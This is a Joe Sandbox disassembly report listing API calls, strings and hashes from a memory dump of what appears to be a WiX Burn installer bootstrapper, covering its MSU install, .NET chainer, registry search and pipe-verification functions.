"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 000E6E75
Failed to wait for executable to complete: %ls, xrefs: 000E709E
wusa.exe, xrefs: 000E6DA0
Failed to find System32 directory., xrefs: 000E6D95
Failed to build MSU path., xrefs: 000E6E35
SysNative\, xrefs: 000E6D6A
msuengine.cpp, xrefs: 000E6F8D, 000E7022, 000E704A
Failed to append SysNative directory., xrefs: 000E6D7D
Failed to append log switch to MSU command-line., xrefs: 000E6EB6
D, xrefs: 000E6F3B
Failed to allocate WUSA.exe path., xrefs: 000E6DB3
Failed to get process exit code., xrefs: 000E702C
Failed to find Windows directory., xrefs: 000E6D5F
"%ls" "%ls" /quiet /norestart, xrefs: 000E6E48
Failed to get action arguments for MSU package., xrefs: 000E6DD6
2, xrefs: 000E6FB3
Failed to append log path to MSU command-line., xrefs: 000E6ED4
Failed to ensure WU service was enabled to install MSU package., xrefs: 000E6F2E
Bootstrapper application aborted during MSU progress., xrefs: 000E7054

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
API String ID: 1400713077-4261965642
Opcode ID: d4ff7d40a74237f90800d49b332de569b813b9e71039746940d3dba7bb00acac
Instruction ID: e89737a6c0d0278e6165bc7678fc682205bed10536b1bd6787c22dfb6ee49956
Opcode Fuzzy Hash: d4ff7d40a74237f90800d49b332de569b813b9e71039746940d3dba7bb00acac
Instruction Fuzzy Hash: A8D1B270A4435AFFDB219FA6DC85FEEBAB8AF18300F504035F604B2192D7B29980DB51

Function 000ED43E Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 290synchronizationprocessCOMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 000ED4B3
StringFromGUID2.OLE32(?,?,00000027), ref: 000ED4DC
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 000ED5C5
GetLastError.KERNEL32(?,?,?,?), ref: 000ED5CF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 000ED668
WaitForSingleObject.KERNEL32(0010B500,000000FF,?,?,?,?), ref: 000ED673
ReleaseMutex.KERNEL32(0010B500,?,?,?,?), ref: 000ED69D
GetExitCodeProcess.KERNEL32(?,?), ref: 000ED6BE
GetLastError.KERNEL32(?,?,?,?), ref: 000ED6CC
GetLastError.KERNEL32(?,?,?,?), ref: 000ED704

Part of subcall function 000ED33E: WaitForSingleObject.KERNEL32(?,000000FF,774D30B0,00000000,?,?,?,?,000ED642,?), ref: 000ED357
Part of subcall function 000ED33E: ReleaseMutex.KERNEL32(?,?,?,?,000ED642,?), ref: 000ED375
Part of subcall function 000ED33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000ED3B6
Part of subcall function 000ED33E: ReleaseMutex.KERNEL32(?), ref: 000ED3CD
Part of subcall function 000ED33E: SetEvent.KERNEL32(?), ref: 000ED3D6

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 000ED7B9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 000ED7D1

Strings

Failed to create netfx chainer guid., xrefs: 000ED4C0
Failed to allocate section name., xrefs: 000ED51D
Failed to CreateProcess on path: %ls, xrefs: 000ED5FE
Failed to get netfx return code., xrefs: 000ED6FA
NetFxEvent.%ls, xrefs: 000ED52B
D, xrefs: 000ED5AA
Failed to create netfx chainer., xrefs: 000ED55E
Failed to allocate netfx chainer arguments., xrefs: 000ED593
Failed to convert netfx chainer guid into string., xrefs: 000ED4FB
Failed to allocate event name., xrefs: 000ED53F
NetFxChainer.cpp, xrefs: 000ED4F1, 000ED5F3, 000ED6F0, 000ED728
Failed to wait for netfx chainer process to complete, xrefs: 000ED732
Failed to process netfx chainer message., xrefs: 000ED648
NetFxSection.%ls, xrefs: 000ED509
%ls /pipe %ls, xrefs: 000ED57F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 1533322865-1825855094
Opcode ID: fb21e29b3dcf0fb3c47e3e230b8f2396ea64651abf639fb0a5af8386cdd906ca
Instruction ID: 3e435d44e26738c5da8e3d73b40f66cbf6e9166765921a03da78f9c841ed0c03
Opcode Fuzzy Hash: fb21e29b3dcf0fb3c47e3e230b8f2396ea64651abf639fb0a5af8386cdd906ca
Instruction Fuzzy Hash: 8AA1A072D04268AFDB219BA5CC45BAEB7B8EF08710F10416AF948F7292E7759D408F91

Function 0010744A Relevance: 45.8, APIs: 13, Strings: 13, Instructions: 340COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 0010755D
SysFreeString.OLEAUT32(00000000), ref: 00107726
SysFreeString.OLEAUT32(00000000), ref: 001077C3

Strings

generator, xrefs: 00107550
icon, xrefs: 00107574
logo, xrefs: 001075B0
updated, xrefs: 00107604
@, xrefs: 001076CC
title, xrefs: 001075E8
atomutil.cpp, xrefs: 00107477, 001077AD
(, xrefs: 00107701
link, xrefs: 001074F2, 001076D4
category, xrefs: 001074B8, 00107665
entry, xrefs: 001074D5, 0010769E
author, xrefs: 0010749B, 0010762C
subtitle, xrefs: 001075CC

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$FreeHeap$AllocateCompareProcess
String ID: ($@$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
API String ID: 1555028553-2592408802
Opcode ID: fb0194f3c2a238e8a687bb44f787522595dbb674ef44a4160c79b1190557d0eb
Instruction ID: 088ad57f7384347b80cb452213664e01f9ee6c522b5c448e66e75a52dd59a635
Opcode Fuzzy Hash: fb0194f3c2a238e8a687bb44f787522595dbb674ef44a4160c79b1190557d0eb
Instruction Fuzzy Hash: 84B17E31E48226FBDB119BA4CC45FAE7674AB14760F200355F661AB2D1D7B0FE50CBA0

Function 0010710D Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00123E78,000000FF,?,?,?), ref: 001071D4
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 001071F9
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00107219
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00107235
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0010725D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00107279
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 001072B2
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 001072EB

Part of subcall function 00106D50: SysFreeString.OLEAUT32(00000000), ref: 00106E89
Part of subcall function 00106D50: SysFreeString.OLEAUT32(00000000), ref: 00106EC8

SysFreeString.OLEAUT32(00000000), ref: 0010736F
SysFreeString.OLEAUT32(00000000), ref: 0010741F

Strings

clbcatq.dll, xrefs: 00107242
feclient.dll, xrefs: 00107206
cabinet.dll, xrefs: 00107150
updated, xrefs: 0010724F
title, xrefs: 0010720B
atomutil.cpp, xrefs: 0010740C
(, xrefs: 0010734A
summary, xrefs: 001071EB
link, xrefs: 00107172, 0010731D
category, xrefs: 00107155, 001072A4
version.dll, xrefs: 00107133
author, xrefs: 00107138, 0010726B
msi.dll, xrefs: 00107137
published, xrefs: 00107227
content, xrefs: 001072DD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-4294603148
Opcode ID: b35978d10cc990bb9071bdb5f8353ef01ef7b5977fd253fa3f8ff648874cd339
Instruction ID: ff9a8ec941d6f48c6e47f14033bf011a2cbc5004677f6424c979bb24e4904d18
Opcode Fuzzy Hash: b35978d10cc990bb9071bdb5f8353ef01ef7b5977fd253fa3f8ff648874cd339
Instruction Fuzzy Hash: C1A17131E48226FBDB219B94CC41FAE7A64BB04730F214355F9A1AA1D1DBB0FA50DB90

Function 000D54DC Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 229filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,0010B500,?,00000000,?,000C452F,?,0010B500), ref: 000D54FD
GetCurrentProcessId.KERNEL32(?,000C452F,?,0010B500), ref: 000D5508
SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,000C452F,?,0010B500), ref: 000D553F
ConnectNamedPipe.KERNEL32(?,00000000,?,000C452F,?,0010B500), ref: 000D5554
GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D555E
Sleep.KERNEL32(00000064,?,000C452F,?,0010B500), ref: 000D5593
SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,000C452F,?,0010B500), ref: 000D55B6
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,000C452F,?,0010B500), ref: 000D55D1
WriteFile.KERNEL32(?,000C452F,0010B500,00000000,00000000,?,000C452F,?,0010B500), ref: 000D55EC
WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,000C452F,?,0010B500), ref: 000D5607
ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,000C452F,?,0010B500), ref: 000D5622
GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D567D
GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D56B1
GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D56E5
GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D5719
GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D574A
GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D577B

Strings

Failed to wait for child to connect to pipe., xrefs: 000D5673
pipe.cpp, xrefs: 000D5669, 000D569D, 000D56D1, 000D5705, 000D5739, 000D576A, 000D579B
crypt32.dll, xrefs: 000D55CF
Failed to reset pipe to blocking., xrefs: 000D5774
Failed to write secret length to pipe., xrefs: 000D5743
Failed to write secret to pipe., xrefs: 000D570F
Failed to read ACK from pipe., xrefs: 000D56A7
Failed to write our process id to pipe., xrefs: 000D56DB
Failed to set pipe to non-blocking., xrefs: 000D57A5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
API String ID: 2944378912-2047837012
Opcode ID: 8c50d4f6cf60d1cbd23d3d74db7cd35c16178f6a1f1e95926f7e7f4a65fab5fb
Instruction ID: 22e3bc64342d0ff7009ae131c85259df9ce20593956b11198cae9c716695e424
Opcode Fuzzy Hash: 8c50d4f6cf60d1cbd23d3d74db7cd35c16178f6a1f1e95926f7e7f4a65fab5fb
Instruction Fuzzy Hash: F771B676D85735BBD7209BA59C45FEEA6A8AF04F12F214126BD04FB280E774DD408AF0

Function 000CA416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000CA45A
_MREFOpen@16.MSPDB140-MSVCRT ref: 000CA480
RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 000CA768

Strings

Failed to read registry value., xrefs: 000CA6F6
Failed to get expand environment string., xrefs: 000CA6DD
Failed to query registry key value., xrefs: 000CA5DA
Unsupported registry key value type. Type = '%u', xrefs: 000CA608
Failed to open registry key., xrefs: 000CA4ED
Failed to allocate memory registry value., xrefs: 000CA587
Registry key not found. Key = '%ls', xrefs: 000CA4B4
Failed to format key string., xrefs: 000CA465
Failed to query registry key value size., xrefs: 000CA554
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 000CA740
search.cpp, xrefs: 000CA54A, 000CA57D, 000CA5D0, 000CA6D3
Failed to allocate string buffer., xrefs: 000CA667
Failed to clear variable., xrefs: 000CA4D8
Failed to format value string., xrefs: 000CA48B
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 000CA51C
Failed to change value type., xrefs: 000CA70F
Failed to set variable., xrefs: 000CA72B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-3124384294
Opcode ID: e57c818aff21a66d89055f82ba7df4d12235eae3168873f6f83ae5828f07140c
Instruction ID: 77f4e86111c6ee951daeda457a455afe3b456cf406017822ec7e52ad05649b24
Opcode Fuzzy Hash: e57c818aff21a66d89055f82ba7df4d12235eae3168873f6f83ae5828f07140c
Instruction Fuzzy Hash: 4CA11772E0062DBBCF229BE4CC45FEEBAB4BF09714F158119F900B6191D7B199009BD2

Function 000C5770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,000CA8B4,00000100,000002C0,000002C0,00000100), ref: 000C5795
lstrlenW.KERNEL32(000002C0,?,000CA8B4,00000100,000002C0,000002C0,00000100), ref: 000C579F
_wcschr.LIBVCRUNTIME ref: 000C59A7
LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,000CA8B4,00000100,000002C0,000002C0,00000100), ref: 000C5C4A

Strings

Failed to allocate buffer for format string., xrefs: 000C57BD
Failed to format record., xrefs: 000C5C0E
Failed to get formatted length., xrefs: 000C5B92
Failed to determine variable visibility: '%ls'., xrefs: 000C5A3A
Failed to allocate record., xrefs: 000C5A0B
*****, xrefs: 000C5913
Failed to copy string., xrefs: 000C5C2E
Failed to append placeholder., xrefs: 000C5A4D
[%d], xrefs: 000C5962
Failed to set variable value., xrefs: 000C5A61
Failed to set record string., xrefs: 000C5B60
Failed to set record format string., xrefs: 000C5AD4
Failed to allocate string., xrefs: 000C5BC1
Failed to reallocate variable array., xrefs: 000C5A2C
Failed to append string., xrefs: 000C581B
variable.cpp, xrefs: 000C59FE, 000C5A1F, 000C5A78, 000C5ACA, 000C5B56, 000C5B88, 000C5C04
Failed to get variable name., xrefs: 000C5A8C
Failed to format placeholder string., xrefs: 000C5A57
Failed to allocate variable array., xrefs: 000C5A85

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: a6f000b39136da9c3297c3aef4e0fa990f75a2c85c86ef5a4157680e1fe6ba76
Instruction ID: 2d3272111a0de21150a2a8dac548139aa14730e5ac11d32b38e0010236b87d48
Opcode Fuzzy Hash: a6f000b39136da9c3297c3aef4e0fa990f75a2c85c86ef5a4157680e1fe6ba76
Instruction Fuzzy Hash: 35F19475901619EEDB209FA58C81FAF7BA4EB04B11F15812DF904BB281D774AE818BE1

Function 000ECE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,000ED558,?,?,?), ref: 000ECEC7
GetLastError.KERNEL32(?,?,000ED558,?,?,?), ref: 000ECED4
ReleaseMutex.KERNEL32(?), ref: 000ED13C

Strings

failed to copy event name to shared memory structure., xrefs: 000ED09A
failed to allocate memory for event name, xrefs: 000ECF1A
Failed to allocate memory for NetFxChainer struct., xrefs: 000ECEAD
NetFxChainer.cpp, xrefs: 000ECEA3, 000ECEF5, 000ECF5A, 000ECFC9, 000ED01B, 000ED063
Failed to create event: %ls, xrefs: 000ECF67
Failed to create mutex: %ls, xrefs: 000ECFD6
%ls_mutex, xrefs: 000ECF75
Failed to MapViewOfFile for %ls., xrefs: 000ED070
%ls_send, xrefs: 000ECF06
failed to allocate memory for mutex name, xrefs: 000ECF89
Failed to memory map cabinet file: %ls, xrefs: 000ED028

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: 1760e043cdf52cad52fb22cb5e2077c7bfdfaa9e37159c986f0b736f6e6b8160
Instruction ID: 207e3e1a27896c636e22ca3bb66691e4cb8b8f58ad963c7d6e60a0f64fb2e292
Opcode Fuzzy Hash: 1760e043cdf52cad52fb22cb5e2077c7bfdfaa9e37159c986f0b736f6e6b8160
Instruction Fuzzy Hash: 7E812576A41372BFD7229B669C49F9ABAA4FF08720F114265FD04BB342D771DD408AE0

Function 000CEA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 001032F3: VariantInit.OLEAUT32(?), ref: 00103309
Part of subcall function 001032F3: SysAllocString.OLEAUT32(?), ref: 00103325
Part of subcall function 001032F3: VariantClear.OLEAUT32(?), ref: 001033AC
Part of subcall function 001032F3: SysFreeString.OLEAUT32(00000000), ref: 001033B7

CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0010CA9C,?,?,Action,?,?,?,00000000,000C5445), ref: 000CEB13
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 000CEB5D

Strings

RelatedBundle, xrefs: 000CEA50
Addon, xrefs: 000CEB9A
cabinet.dll, xrefs: 000CEBBA
Failed to resize Detect code array in registration, xrefs: 000CEC2E
Patch, xrefs: 000CEBDD
Detect, xrefs: 000CEB04
Failed to resize Upgrade code array in registration, xrefs: 000CEC35
Failed to resize Addon code array in registration, xrefs: 000CEC3C
Failed to get next RelatedBundle element., xrefs: 000CEC70
Failed to get @Id., xrefs: 000CEC62
Failed to get RelatedBundle nodes, xrefs: 000CEA72
Invalid value for @Action: %ls, xrefs: 000CEC52
Failed to resize Patch code array in registration, xrefs: 000CEC43
version.dll, xrefs: 000CEB70
Failed to get @Action., xrefs: 000CEC69
comres.dll, xrefs: 000CEB26
Upgrade, xrefs: 000CEB50
Failed to get RelatedBundle element count., xrefs: 000CEA97
Action, xrefs: 000CEAD0

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$CompareVariant$AllocClearFreeInit
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
API String ID: 702752599-259800149
Opcode ID: 97e892a6a4a7700523608389f5f9f71dc6c79dfbbf01f078ca2950f16bf9f8c6
Instruction ID: 32e846222c80a3860446062e37af0a5f75cab55bc63723222cdf73f968fe5fc4
Opcode Fuzzy Hash: 97e892a6a4a7700523608389f5f9f71dc6c79dfbbf01f078ca2950f16bf9f8c6
Instruction Fuzzy Hash: FD71A031A05616BFCB25DB94C985FAEB7B4FF04720F204268F911A72C1D771AE42CB90

Function 000D46DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,000D4BF5,0010B4E8,?,feclient.dll,00000000,?,?), ref: 000D46F3
ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,000D4BF5,0010B4E8,?,feclient.dll,00000000,?,?), ref: 000D4714
GetLastError.KERNEL32(?,000D4BF5,0010B4E8,?,feclient.dll,00000000,?,?), ref: 000D471A
ReadFile.KERNEL32(feclient.dll,00000000,0010B518,?,00000000,00000000,0010B519,?,000D4BF5,0010B4E8,?,feclient.dll,00000000,?,?), ref: 000D47A8
GetLastError.KERNEL32(?,000D4BF5,0010B4E8,?,feclient.dll,00000000,?,?), ref: 000D47AE

Strings

Failed to allocate buffer for verification secret., xrefs: 000D4791
feclient.dll, xrefs: 000D46E2, 000D4712, 000D4713, 000D47A7, 000D482C, 000D4882
msasn1.dll, xrefs: 000D482B
pipe.cpp, xrefs: 000D473E, 000D4769, 000D47D2, 000D480A, 000D4857, 000D48B1, 000D48F1
Failed to inform parent process that child is running., xrefs: 000D48BB
Failed to read verification secret from parent pipe., xrefs: 000D47DC
Verification secret from parent does not match., xrefs: 000D4816
Verification process id from parent does not match., xrefs: 000D48FD
Verification secret from parent is too big., xrefs: 000D4775
Failed to read size of verification secret from parent pipe., xrefs: 000D4748
Failed to read verification process id from parent pipe., xrefs: 000D4861

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
